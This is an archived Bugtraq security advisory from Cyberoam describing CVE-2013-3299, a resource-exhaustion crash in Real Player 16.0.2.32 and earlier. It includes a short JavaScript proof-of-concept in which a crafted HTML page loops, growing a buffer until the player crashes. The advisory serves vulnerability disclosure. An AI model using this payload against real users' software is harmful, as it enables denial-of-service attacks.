[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Real player resource exhaustion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Real player resource exhaustion Vulnerability
From: akshay.vaghela@xxxxxxxxxxxx
Date: Tue, 2 Jul 2013 13:13:48 GMT

Title:
====

Real player resource exhaustion Vulnerability


Credit:
======
Name: Akshaysinh Vaghela
Company/affiliation: Cyberoam Technologies Private Limited
Website: www.cyberoam.com


CVE:
=====

CVE-2013-3299


Date:
====

2013-04-23

CL-ID:
====

CRD-2013-03


Vendor:
======

Real Networks creates products and services that make it easier for people to 
access and enjoy digital media on the devices and platforms they choose to use.


Product:
=======

Real Player: The first application that allows enables people to easily 
download online video, transfer it to a favorite device and share it with 
friends via Facebook and Twitter.

Product link: http://in.real.com/?mode=rp


Abstract:
=======

Cyberoam Threat Research Labs discovered a Resource exhaustion Vulnerability in 
Real Player <= 16.0.2.32 .

Report-Timeline:
============
2013-04-23: Vendor notification
2013-05-23: Vendor's Last Response
2013-06-03: Notification Follow-up Date
2013-00-00: Vendor Fix/Patch
2013-06-04: Public Disclosure


Affected Version:
=============
Ver ( <= 16.0.2.32 )

Exploitation-Technique:
===================

Network

Severity Rating:
===================

9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C)


Details:
=======
Real Networks Real Player is prone to Resource exhaustion vulnerability. When 
processing specially crafted HTML file, Real Player uses a value from the file 
to control a loop operation. Real player fails to validate the value before 
using it, which leads to DoS / Crash.


Caveats / Prerequisites:
======================

The attacker needs to entice victims to perform an action in order to exploit 
this vulnerability.

Proof Of Concept:
================

http://i40.tinypic.com/2mg1gt3.jpg
http://i39.tinypic.com/5phchx.png


POC Exploit code:

<html>
<head>
<script language="JavaScript">
       {
        var buffer = '\x41'
    for(i=0; i <= 100 ; ++i)
        {
    buffer+=buffer+buffer
        document.write(buffer);
        }
}
</script>
</head>
</html>


Risk:
=====

The security risk of the Resource exhaustion Vulnerability is estimated as High.


Disclaimer:
===========

The information provided in this advisory is provided as it is without any 
warranty. Any modified copy or reproduction, including partially usages, of 
this file requires authorization from Cyberoam Vulnerability Research Team. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Cyberoam Vulnerability Research Team.


The first attempt at contact will be through any appropriate contacts or formal 
mechanisms listed on the vendor Web site, or by sending an e-mail with the 
pertinent information about the vulnerability. Simultaneous with the vendor 
being notified, Cyberoam may distribute vulnerability protection filters to its 
customers' IPS devices through the IPS upgrades.

If a vendor fails to respond after five business days, Cyberoam Vulnerability 
Research Team may issue a public advisory disclosing its findings fifteen 
business days after the initial contact.

If a vendor response is received within the timeframe outlined above, Cyberoam 
Vulnerability Research Team will allow the vendor 6-months to address the 
vulnerability with a patch. At the end of the deadline if a vendor is not 
responsive or unable to provide a reasonable statement as to why the 
vulnerability is not fixed, the Cyberoam Vulnerability Research Team will 
publish a limited advisory to enable the defensive community to protect the 
user. We believe that by doing so the vendor will understand the responsibility 
they have to their customers and will react appropriately.

Cyberoam Vulnerability Research Team will make every effort to work with 
vendors to ensure they understand the technical details and severity of a 
reported security flaw. If a product vendor is unable to, or chooses not to, 
patch a particular security flaw, Cyberoam Vulnerability Research Team will 
offer to work with that vendor to publicly disclose the flaw with some 
effective workarounds.

Before public disclosure of a vulnerability, Cyberoam Vulnerability Research 
Team may share technical details of the vulnerability with other security 
vendors who are in a position to provide a protective response to a broader 
user base.

Prev by Date: WordPress category-grid-view-galler plugin Cross-Site Scripting Vulnerabilities
Next by Date: [ MDVSA-2013:191 ] fail2ban
Previous by thread: WordPress category-grid-view-galler plugin Cross-Site Scripting Vulnerabilities
Next by thread: re: Real player resource exhaustion Vulnerability
Index(es):
- Date
- Thread